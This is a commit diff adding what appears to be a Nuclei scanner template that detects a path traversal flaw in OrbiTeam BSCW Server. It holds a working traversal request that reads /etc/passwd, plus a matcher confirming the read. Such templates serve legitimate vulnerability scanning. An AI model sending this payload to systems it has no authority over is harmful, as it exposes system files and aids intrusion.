Create orbiteam-bscw-server-unauthenticated-lfi.yaml
parent
8bbf1d2189
commit
286e7d2410
|
@ -0,0 +1,25 @@
|
|||
id: orbiteam-bscw-server-unauthenticated-lfi
|
||||
info:
|
||||
name: OrbiTeam BSCW Server - Unauthenticated LFI
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
description: OrbiTeam BSCW Server versions 5.0.x, 5.1.x, 5.2.4 and below, 7.3.x and below, and 7.4.3 and below suffer from path traversal
|
||||
reference:
|
||||
- https://packetstormsecurity.com/files/165156/OrbiTeam-BSCW-Server-XSS-LFI-User-Enumeration.html
|
||||
tags: bscw,orbiteam,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/pub/bscw.cgi/30?op=theme&style_name=../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue